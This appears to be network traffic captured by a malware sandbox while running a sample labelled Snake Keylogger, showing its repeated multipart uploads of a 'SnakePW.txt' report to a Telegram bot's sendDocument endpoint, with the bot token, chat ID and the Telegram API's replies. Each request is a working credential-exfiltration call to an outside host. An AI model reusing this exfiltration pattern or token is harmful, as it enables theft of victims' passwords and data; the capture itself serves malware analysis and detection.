                                                                    2022-06-26 07:34:12 UTC368OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 63 39 64 62 33 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570c9db3f6Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:13 UTC368INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:13 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:13 UTC369INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66995,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228853,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    219192.168.2.550129149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:13 UTC369OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570cdbaffa
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:13 UTC370OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 63 64 62 61 66 66 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570cdbaffaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:13 UTC370INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:13 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:13 UTC371INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 39 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66996,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228853,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    22192.168.2.549790149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:47 UTC37OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d9a700e3
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:47 UTC37OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 39 61 37 30 30 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d9a700e3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:47 UTC37INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:47 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:47 UTC38INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66769,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228767,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    220192.168.2.550130149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:13 UTC371OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570d174be5
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:13 UTC371OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 64 31 37 34 62 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570d174be5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:14 UTC372INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:13 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:14 UTC372INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 39 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66997,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228853,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    221192.168.2.550131149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:14 UTC373OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570d554840
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:14 UTC373OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 64 35 35 34 38 34 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570d554840Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:14 UTC374INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:14 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:14 UTC374INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66998,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228854,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    222192.168.2.550132149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:14 UTC374OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570d90e459
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:14 UTC375OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 64 39 30 65 34 35 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570d90e459Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:14 UTC375INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:14 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:14 UTC376INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67000,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228854,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    223192.168.2.550133149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:14 UTC376OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570dc7be8e
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:34:14 UTC376OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 30 64 63 37 62 65 38 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da57570dc7be8eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:34:15 UTC377INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:34:15 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:34:15 UTC377INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 35 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":67001,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228855,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    224192.168.2.550134149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:34:15 UTC378OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da57570e1403db
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
